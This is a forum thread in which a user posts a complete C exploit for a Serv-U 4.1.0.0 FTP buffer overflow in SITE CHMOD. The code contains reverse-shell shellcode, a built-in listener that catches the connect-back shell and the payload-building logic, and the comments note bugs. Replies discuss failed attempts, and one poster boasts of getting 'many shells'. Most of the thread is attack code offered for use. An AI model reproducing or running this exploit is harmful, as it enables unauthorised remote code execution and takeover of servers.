
Candypapa
/*
date: 25 janv 2004
software: Serv-U 4.1.0.0 (prolly others)
vendor: RhinoSoft, http://www.serv-u.com/
credits: kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt
greets: rosecurity team, int3liban
notes: should work on any NT, reverse bindshell, terminates the process
properly handle directories
author: mandragore, sploiting@mandragore.solidshells.com

cheap changelog:
27 jan 2004 improved banners handling (select()'s),
added listener,
default ip gathering (needs ifconfig & gawk)

*/

#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

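/* Report the failing call with perror() and exit with status 1.
 * Wrapped in do { } while (0) so it behaves as a single statement and is
 * safe after an unbraced if, including one followed by an else. */
#define fatal(x) do { perror(x); exit(1); } while (0)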

/* Windows payload that main() places inside the oversized SITE CHMOD argument.
 * 204 bytes and NO terminating zero: main() sizes it with strlen(sc), which
 * reads past the end of the array until it happens to meet a 0x00 byte in
 * whatever follows it in memory. main() also overwrites bytes 0x53..0x56
 * (lhost) and 0x5a..0x5b (lport) in place, after XORing each with 0x96 —
 * the value 0x96 recurs throughout the bytes below, which suggests a
 * 0x96-keyed decoder, but that is not verified here. */
unsigned char sc[]={
// reverse bindshell, 204 bytes, uses import table
0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68,

0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9,

0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2,

0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,

0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,

0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86,

0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,

0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,

0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB,

0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4,

0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96,

0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A,

0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
};

/* FTP credentials and upload directory; -u/-s/-w in main() replace them. */
char *user = "anonymous";
char *pass = "not@for.you";
char *path = "/incoming";

/* Control socket and the result of the last socket call, shared by
 * main() and reads(); callback() reuses both in the child after fork(). */
int s;
int ret;
/* 4096-byte scratch buffer, malloc()ed separately by main() and callback(). */
char *buff;
/* Non-zero echoes every FTP line sent and received (-v 1). */
int verbose = 0;
/* Socket address filled independently for the listener bind() (child)
 * and the FTP connect() (parent). */
struct sockaddr_in saddr;
/* Connect-back host (network byte order) and port patched into sc;
 * -H/-P override the defaults from getip() and 8888. */
int lhost;
int lport = 8888;

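/* Print the command-line help to stdout and exit with status 1.
 * The defaults shown are the current values of the globals, so a usage()
 * triggered after option parsing reflects whatever -u/-s/-w/-H/-P set.
 * argv0: program name as given in argv[0]. Never returns. */
void usage(char *argv0) {
    /* Copy lhost into a real in_addr instead of reinterpreting the int in
     * place through a cast, which violates strict aliasing. */
    struct in_addr lh;
    lh.s_addr = (in_addr_t)lhost;

    printf("usage: %s -d <ip_dest> [options]\n", argv0);
    printf("options:\n");
    printf(" -d target ip\n");
    printf(" -p target port (default 21)\n");
    printf(" -u username to log with (default %s)\n", user);
    printf(" -s password to log with (default %s)\n", pass);
    printf(" -w writable directory (default %s)\n", path);
    printf(" -H listening host (default %s)\n", inet_ntoa(lh));
    printf(" -P listening port on host (default %d)\n", lport);
    printf(" -v verbose (set to 1 to enable)\n");
    printf("\n");
    exit(1);
}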

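/* Drain the FTP server's reply from the control socket `s` into `buff`.
 * Reads one chunk, NUL-terminates it (echoing it when verbose), and keeps
 * reading while select() reports more data within one second; the last chunk
 * read is what the caller finds in buff (e.g. the strstr() for "230").
 * Stops as soon as recv() fails or the peer has closed the connection: the
 * original indexed buff with the -1 from a failed recv() (writing buff[-1])
 * and looped forever on a closed socket, which select() keeps reporting
 * readable. buff must hold at least 4096 bytes; the global ret is updated. */
void reads() {
    fd_set fds;
    struct timeval tv;

    for (;;) {
        ret = recv(s, buff, 4095, 0);
        if (ret <= 0) {
            /* Error or orderly shutdown: nothing valid was read. */
            return;
        }
        buff[ret] = '\0';
        if (verbose) printf("%s", buff);

        /* Multi-line banners arrive in pieces; wait up to 1s for more.
         * Anything but a timeout (more data, or a select() error) reads again,
         * as the original did. */
        FD_ZERO(&fds);
        FD_SET(s, &fds);
        tv.tv_sec = 1;
        tv.tv_usec = 0;
        if (select(s + 1, &fds, NULL, NULL, &tv) == 0) {
            return;
        }
    }
}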

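/* Guess the local IPv4 address used as the default connect-back host (-H).
 * Shells out to /sbin/ifconfig piped through grep and gawk (Linux-specific;
 * grep and gawk are resolved through PATH) and takes the address from the
 * first interface line carrying a Bcast field.
 * Returns the address in network byte order, or INADDR_NONE (-1) when the
 * pipe cannot be opened or produces no output — the same value inet_addr()
 * yields for an empty string, so main() then demands an explicit -H.
 * The original dereferenced a NULL FILE* when popen() failed and left the
 * local buffer named `buff`, shadowing the global. */
int getip() {
    char addr[17] = "";
    FILE *f;

    f = popen("echo -n `/sbin/ifconfig|grep Bcast|"
              "gawk '{\\$0=gensub(/:/,\" \",1);print $3;exit;}'`", "r");
    if (f == NULL) {
        return INADDR_NONE;
    }
    /* Same 16-byte limit as before; no output (e.g. gawk missing) leaves addr
     * empty, which inet_addr() rejects below. */
    if (fgets(addr, sizeof addr - 1, f) == NULL) {
        addr[0] = '\0';
    }
    pclose(f);

    return inet_addr(addr);
}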

/* Listener side, run in the forked child (see main()).
 * Binds INADDR_ANY:port, accepts exactly one connection, then relays bytes
 * between the local terminal and that connection until one side fails.
 * port: TCP port to listen on (the -P value, default 8888).
 * Never returns normally. On bind() failure it sends SIGUSR1 to the parent
 * (handled by killmain) so the FTP side is abandoned, then exit()s. */
void callback(int port) {
fd_set fds;
// NOTE(review): accept() takes a socklen_t*; an int* is passed here.
int s_len=sizeof(saddr);
int sn;

// Separate from the parent's buffer after fork(); malloc() result unchecked.
buff=(char *)malloc(4096);

saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = 0;   // INADDR_ANY
saddr.sin_port = htons(port);
printf("[.] setting up listener on port %d..\n",port);
s=socket(2,1,6);   // AF_INET, SOCK_STREAM, IPPROTO_TCP on Linux/x86, written as magic numbers
ret=bind(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1) {
// we don't want to crash servu if not needed
perror("[-] shell.bind");
kill(getppid(),SIGUSR1);
exit(1);
}
listen(s,1);
// Blocks until a peer connects; the return value is not checked and saddr
// is overwritten with the peer's address.
sn=accept(s,(struct sockaddr *)&saddr,&s_len);
printf("[+] got connection from %s, entering shell..\n", \
inet_ntoa(*(struct in_addr *)&saddr.sin_addr.s_addr));

// Relay loop: select() on stdin (fd 0) and the accepted socket, no timeout.
while(1) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sn,&fds);

if (select(sn+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select ");

if (FD_ISSET(0,&fds)) {
// NOTE(review): fd 0 was polled but the read is from fd 1; this only works
// while both are the same tty. ret is passed to send() unchecked, so a
// read() of 0 or -1 is forwarded as-is.
ret = read(1,buff,4096);
send(sn,buff,ret,0);
}

if (FD_ISSET(sn,&fds)) {
// Peer closed (0) or error (-1): leave through fatal(), i.e. perror()+exit(1).
if ( (ret=recv(sn,buff,4096,0)) < 1 )
fatal("[-] shell.recv");
write(1,buff,ret);
}

}

}

/* SIGUSR1 handler installed in the listener child by main(): the parent gave
 * up (connect() failed or the session ended), so report and quit.
 * Registered through signal(); declared without parameters, as the rest of
 * this file does. NOTE(review): printf()/exit() are not async-signal-safe. */
void killchild() {
    puts("[-] got signal from parent, exiting.");
    exit(1);
}

/* SIGUSR1 handler installed in the parent by main(): the listener child could
 * not bind its port, so stop before touching the FTP server.
 * Registered through signal(); declared without parameters, as the rest of
 * this file does. NOTE(review): printf()/exit() are not async-signal-safe. */
void killmain() {
    puts("[-] got signal from child, exiting.");
    exit(1);
}

/* Entry point: parse options, fork a listener child (callback()), log in to
 * the target FTP server, CWD to a writable directory, then send one 602-byte
 * "SITE CHMOD 777 ..." command padded with 0x90 and carrying sc. A closed or
 * errored control connection afterwards is reported as success ("[+] done",
 * exit status 1 via fatal()); any reply is reported as "not vulnerable" and
 * exits with 0. argc/argv: standard; see usage() for the options. */
int main(int argc, char **argv) {
// -p is kept in a short: values above 32767 wrap negative in the %d prints.
short port=21;
int target=0;
int i, pid;

// Layout constants for the oversized argument; used by the memcpy()s below.
int delta=423;
int callebx=0x10077A92; // libeay32.dll
char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
char chmod[]="SITE CHMOD 777 ";

printf("[%%] Serv-u v4.1.0.0 sploit by mandragore (v2)\n");

// Default -H: the first local address with a Bcast line, via ifconfig/gawk.
lhost=getip();

if (argc<2)
usage(argv[0]);

// getopt() returns -1 when done; comparing with EOF relies on EOF == -1.
while((i = getopt(argc, argv, "d:p:u:s:w:H:P:v:"))!= EOF) {
switch (i) {
case 'd':
target=inet_addr(optarg);
break;
case 'p':
port=atoi(optarg);
break;
case 'u':
user=optarg;
break;
case 's':
pass=optarg;
break;
case 'w':
path=optarg;
break;
case 'H':
lhost=inet_addr(optarg);
break;
case 'P':
lport=atoi(optarg);
break;
case 'v':
verbose=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}

// inet_addr() yields INADDR_NONE (-1) for an unparsable address; lhost==0
// also covers getip() returning 0.0.0.0 / an unset -H.
if ((target==-1) || (lhost==-1) || (lhost==0))
usage(argv[0]);

printf("[.] if working you'll have a shell on %s:%d.\n", \
inet_ntoa(*(struct in_addr *)&lhost),lport);
printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);

// Child: wait for the connect-back in callback(); parent: drive the FTP
// session. Each side stops the other with SIGUSR1 (killchild/killmain).
// fork() returning -1 is not handled.
pid=fork();
switch(pid) {
case 0:
signal(SIGUSR1,killchild);
callback(lport);
break;
default:
signal(SIGUSR1,killmain);
break;
}

// Patch the listener port (byte-swapped) and host into sc, each XORed with
// 0x96 first. The memcpy()s take the first 2/4 bytes of the ints as laid out
// in memory, i.e. the low-order bytes on a little-endian host.
lport=lport ^ 0x9696;
lport=(lport & 0xff) << 8 | lport >>8;
memcpy(sc+0x5a,&lport,2);

lhost=lhost ^ 0x96969696;
memcpy(sc+0x53,&lhost,4);

buff=(char *)malloc(4096);   // unchecked

saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = target;
saddr.sin_port = htons(port);

s=socket(2,1,6);   // AF_INET, SOCK_STREAM, IPPROTO_TCP on Linux/x86, as magic numbers

ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1) {
kill(pid,SIGUSR1); sleep(1);   // stop the listener child before giving up
fatal("[-] connect()");
}
reads();   // greeting banner

// USER/PASS/CWD are formatted with sprintf() into the 4096-byte buff; -u/-s/-w
// values long enough overflow the tool's own heap buffer.
sprintf(buff,"USER %s\r\n",user);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);

reads();

sprintf(buff,"PASS %s\r\n",pass);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);

reads();

// 230 = "User logged in"; anything else in the last reply chunk aborts.
if (strstr(buff,"230")==0) {
printf("[-] can't login\n");
exit(1);
} else
printf("[+] logged in.\n");

sprintf(buff,"CWD %s\r\n",path);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);

reads();

// verify directory
sprintf(buff,"PWD\r\n",path);   // `path` is an extra argument the format never uses
send(s,buff,strlen(buff),0);
ret=recv(s,buff,1024,0);   // unchecked: -1 makes the next line write buff[-1]
memset(buff+ret,0,1);
// Length of the quoted working directory in the reply (skipping the 5-byte
// '257 "' prefix). A missing closing quote makes strstr() return NULL and
// leaves i far out of range.
i=strstr(buff+5,"\x22")-buff-5;
if (i!=1) i++; // trailing /

printf("[+] sending exploit..\n");

// Build the request: 600 bytes of 0x90 plus CRLF, the command prefix at the
// front, and sc, jmpback and callebx placed relative to delta. strlen(sc) is
// applied to an array with no terminating zero, so it reads beyond sc.
bzero(buff,4096);
memset(buff,0x90,600);
strcat(buff,"\r\n");
delta-=i; // strlen(path);
memcpy(buff,&chmod,strlen(chmod));
memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
memcpy(buff+delta-9,&jmpback,5+4);
memcpy(buff+delta,&callebx,4);

send(s,buff,602,0);

// No reply (connection closed or reset) is taken as the server having died.
// fatal() reports through perror(), so "[+] done" is followed by an errno
// text and the exit status is 1 on this path too.
ret=recv(s,buff,1024,0);
if ((ret==0) || (ret==-1)) {
kill(pid,SIGUSR1); sleep(1);   // signals the listener child, then exits
sleep(1);
fatal("[+] done");
}

// The server answered: show its reply and exit cleanly.
printf("[-] remote servu isn't vulnerable.\n");
memset(buff+ret,0,1);
printf("%s",buff);

close(s);

exit(0);
}


it works ! smile.gif get many shells with it
phaeton
Just crashes serv-u for me dry.gif
Train25
Same results on this end. Just crashed. Thanxs for the post.
Flinston
doesn't work for me too ... it crashes servu but theres no shell ....

but I'm, wondering about this:
the exploit sets up a listener ... but it doesn't wait for an connection ... after serv-u is crashed it says this to me and exits ... so the reverse shell can't even connect ! o.O
BuzzDee
doesn't work for me, too. Only an error message pops up. For those who understand German, this is the error message I get:

` Der Prozedureinsprungspunkt `getopt` wurde in der DLL `cygwin1.dll` nicht gefunden.`


maybe someone could help me?

greetz
ellitio
QUOTE (BuzzDee @ Jan 31 2004, 03:50 PM)
doesnt work for me, too. only an error message pops up. for those which understand german this is the error messag i get:

` Der Prozedureinsprungspunkt `getopt` wurde in der DLL `cygwin1.dll` nicht gefunden.`


maybe someone could help me?

greetz

lol i am not german but dutch

but it says something about that he can't find cygwin1.dll
Sedi
Big thx for this tool dude, nice tool ^^

 